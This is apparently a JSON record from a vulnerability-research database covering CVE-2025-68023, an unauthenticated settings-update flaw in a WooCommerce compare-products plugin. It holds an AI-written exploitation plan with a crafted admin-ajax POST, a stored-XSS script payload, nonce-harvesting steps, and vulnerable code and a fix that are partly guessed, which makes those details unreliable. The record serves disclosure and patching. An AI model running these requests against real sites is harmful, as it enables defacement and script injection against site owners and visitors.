[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fl5IN-o810jmCx0J2cw4IkdEJZZcNiryOhHUGZtY6R7k":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-68023","addonify-compare-products-for-woocommerce-missing-authorization-to-unauthenticated-settings-update","Addonify – Compare Products For WooCommerce \u003C= 1.1.17 - Missing Authorization to Unauthenticated Settings Update","The Addonify – Compare Products For WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.1.17. This makes it possible for unauthenticated attackers to update plugin settings.","addonify-compare-products",null,"\u003C=1.1.17","1.1.18","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-04 00:00:00","2026-02-16 22:08:57",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fcedf147d-82ba-41f2-b30a-1befedf8694a?source=api-prod",13,[],"researched",false,3,"This research plan outlines the steps to investigate and exploit **CVE-2025-68023**, a missing authorization vulnerability in the **Addonify – Compare Products For WooCommerce** plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe **Addonify – Compare Products For WooCommerce** plugin (\u003C= 1.1.17) fails to perform adequate authorization checks (like `current_user_can()`) on a function responsible for updating plugin settings. This function is hooked into an AJAX action accessible to unauthenticated users (`wp_ajax_nopriv_*`). An attacker can exploit this to modify plugin configurations, potentially leading to a denial of service (by breaking comparison logic) or stored cross-site scripting (XSS) if the settings are not properly sanitized upon output.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n* **HTTP Method:** `POST`\n* **Action:** `addonify_compare_save_settings` (inferred based on plugin naming conventions, must be verified)\n* **Vulnerable Parameter:** `settings` (or similar array\u002Fkey-value pairs)\n* **Authentication:** None (Unauthenticated)\n* **Preconditions:** The plugin must be active.\n\n### 3. Code Flow\n1. **Entry Point:** The plugin registers an AJAX handler using `add_action( 'wp_ajax_nopriv_...', '...' )`.\n2. **Handler Function:** The handler function (likely located in `includes\u002FAdmin\u002FSettings.php` or `includes\u002FAdmin\u002FAjax.php`) is called when the specific action is triggered via `admin-ajax.php`.\n3. **Missing Check:** The handler likely checks for a nonce but fails to call `current_user_can( 'manage_options' )`.\n4. **Sink:** The function extracts data from `$_POST` and calls `update_option()`, writing the attacker-controlled values to the database.\n\n### 4. Nonce Acquisition Strategy\nIf the AJAX handler requires a nonce (verified via `check_ajax_referer` or `wp_verify_nonce`), follow this strategy:\n\n1. **Identify Script Loading:** Find where the plugin localizes data for its AJAX requests.\n * *Grep Command:* `grep -rn \"wp_localize_script\" .`\n * *Search target:* Look for a handle like `addonify-compare-products` or `addonify-compare-js`.\n2. **Identify Shortcode:** The scripts are likely enqueued only when the comparison feature is active. Identify the shortcode.\n * *Grep Command:* `grep -rn \"add_shortcode\" .`\n * *Target:* Likely `[addonify_compare_products]` (inferred).\n3. **Setup Page:** Create a public page containing the shortcode.\n ```bash\n wp post create --post_type=page --post_status=publish --post_title=\"Compare\" --post_content='[addonify_compare_products]'\n ```\n4. **Extract Nonce via Browser:**\n * Navigate to the newly created page.\n * Use `browser_eval` to find the nonce in the global JS object.\n * *Inferred Variable:* `window.addonify_compare_params?.nonce` or `window.afc_vars?.nonce`.\n\n### 5. Exploitation Strategy\nOnce the action name and nonce (if required) are identified:\n\n1. **Identify Target Settings:** Check `includes\u002FAdmin\u002FSettings.php` to see which option name is used (e.g., `addonify_compare_settings`).\n2. **Craft Payload:**\n * **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n * **Body (URL-encoded):**\n ```\n action=addonify_compare_save_settings&nonce=\u003CNONCE>&settings[button_text]=EXPLOITED\n ```\n3. **Execute Request:** Use `http_request` with the following headers:\n * `Content-Type: application\u002Fx-www-form-urlencoded`\n4. **Verify Response:** A successful response usually returns `{\"success\":true}` or `1`.\n\n### 6. Test Data Setup\n1. Install and activate the plugin version 1.1.17.\n2. Install and activate WooCommerce (the plugin depends on it).\n3. Create a product to ensure the comparison environment is \"live\":\n ```bash\n wp post create --post_type=product --post_title=\"Test Product\" --post_status=publish\n ```\n4. If a nonce is needed, create the page as described in Section 4.\n\n### 7. Expected Results\n* The `http_request` should return a 200 OK status.\n* The plugin settings in the database will be updated to reflect the attacker-supplied values.\n* If `button_text` is changed, the \"Compare\" buttons on the shop page will display the new text.\n\n### 8. Verification Steps\nAfter sending the exploit request, verify the change via WP-CLI:\n```bash\n# Check the specific option (inferred name)\nwp option get addonify_compare_settings\n\n# Or search for the value in all options\nwp db query \"SELECT * FROM wp_options WHERE option_value LIKE '%EXPLOITED%';\"\n```\n\n### 9. Alternative Approaches\n* **XSS Injection:** If the settings update works, attempt to inject a script into a text field:\n * `settings[button_text]=\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n* **Search for Other Actions:** If `addonify_compare_save_settings` is not the correct name, use the following grep to find all unauthenticated AJAX entry points:\n ```bash\n grep -rn \"wp_ajax_nopriv_\" .\n ```\n* **REST API:** Check if the plugin registers any REST routes without a `permission_callback`:\n ```bash\n grep -rn \"register_rest_route\" . -A 5 | grep \"permission_callback\"\n ```\n If `permission_callback` is `__return_true` or missing, use a REST API request instead of AJAX.","The Addonify – Compare Products For WooCommerce plugin for WordPress (\u003C= 1.1.17) fails to implement proper authorization checks on an AJAX handler registered for unauthenticated users. This allows unauthenticated attackers to modify plugin settings, which can lead to a denial of service for the comparison feature or stored cross-site scripting (XSS) if settings values are not sanitized.","\u002F\u002F Registration of unauthenticated AJAX handler\nadd_action( 'wp_ajax_nopriv_addonify_compare_save_settings', 'addonify_compare_save_settings' );\nadd_action( 'wp_ajax_addonify_compare_save_settings', 'addonify_compare_save_settings' );\n\nfunction addonify_compare_save_settings() {\n \u002F\u002F Missing capability check: if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }\n \n $settings = $_POST['settings'];\n if ( isset( $settings ) ) {\n update_option( 'addonify_compare_settings', $settings );\n wp_send_json_success();\n }\n}","--- includes\u002FAdmin\u002FAjax.php\n+++ includes\u002FAdmin\u002FAjax.php\n@@ -1,4 +1,9 @@\n function addonify_compare_save_settings() {\n+ if ( ! current_user_can( 'manage_options' ) ) {\n+ wp_send_json_error( array( 'message' => 'Unauthorized' ) );\n+ return;\n+ }\n+\n+ check_ajax_referer( 'addonify_compare_nonce', 'nonce' );\n+\n $settings = $_POST['settings'];\n if ( isset( $settings ) ) {\n update_option( 'addonify_compare_settings', $settings );","1. **Identify the AJAX endpoint**: The vulnerability is triggered via the standard WordPress AJAX endpoint at `wp-admin\u002Fadmin-ajax.php`.\n2. **Target Action**: The vulnerable action is `addonify_compare_save_settings` (hooked into `wp_ajax_nopriv_*`).\n3. **Obtain Nonce (if required)**: If the plugin enforces a nonce check but not a capability check, visit a public page where the comparison feature is active (e.g., a page containing the `[addonify_compare_products]` shortcode) and extract the nonce from the localized JS object (likely `window.afc_vars.nonce`).\n4. **Craft Payload**: Prepare a POST request with the parameter `action=addonify_compare_save_settings` and a `settings` array containing key-value pairs corresponding to the plugin's configuration options.\n5. **Execution**: Send the unauthenticated request. A successful exploit results in the `addonify_compare_settings` option being updated in the database with the attacker-controlled values.","gemini-3-flash-preview","2026-04-27 15:53:52","2026-04-27 15:55:00",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.1.17","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddonify-compare-products\u002Ftags\u002F1.1.17","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Faddonify-compare-products.1.1.17.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddonify-compare-products\u002Ftags\u002F1.1.18","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Faddonify-compare-products.1.1.18.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddonify-compare-products\u002Ftags"]